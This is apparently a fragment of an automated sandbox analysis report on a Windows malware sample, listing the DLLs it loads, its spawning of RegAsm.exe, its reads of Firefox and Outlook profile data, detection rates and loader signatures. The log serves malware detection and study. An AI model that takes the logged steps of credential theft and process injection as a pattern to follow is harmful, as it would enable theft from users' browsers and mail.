                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: LmIclOjfqc.exeVirustotal: Detection: 53%
                        Source: LmIclOjfqc.exeReversingLabs: Detection: 51%
                        Source: LmIclOjfqc.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
                        Source: unknownProcess created: C:\Users\user\Desktop\LmIclOjfqc.exe "C:\Users\user\Desktop\LmIclOjfqc.exe"
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: LmIclOjfqc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: LmIclOjfqc.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: LmIclOjfqc.exeStatic file information: File size 1641984 > 1048576
                        Source: LmIclOjfqc.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x18f200
                        Source: LmIclOjfqc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1951861800.0000000005D40000.00000004.08000000.00040000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E59000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1951861800.0000000005D40000.00000004.08000000.00040000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E59000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 0.2.LmIclOjfqc.exe.6e90000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 0.2.LmIclOjfqc.exe.6e90000.7.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 0.2.LmIclOjfqc.exe.6e90000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 0.2.LmIclOjfqc.exe.6e90000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 0.2.LmIclOjfqc.exe.6e90000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Yara detected Costura Assembly Loader
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.6da0000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.6da0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1954358252.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1933083142.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LmIclOjfqc.exe PID: 7264, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_05DB31E5 push eax; ret 0_2_05DB31F9
                        Source: 0.2.LmIclOjfqc.exe.69d0000.4.raw.unpack, gaD8glRyU9w9U6Ed2kX.csHigh entropy of concatenated method names: 'A9YRgljVO2', 'tQpR8JwYsB', 'HFNRLhEDYI', 'uyNRo1Xvwo', 'yZqRUwh3Oq', 'FSDRWPJDfM', 'ebpRNVCBJT', 's1GRQfgj9h', 'MnnRi2vMhy', 'wmVRqyWQAS'
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
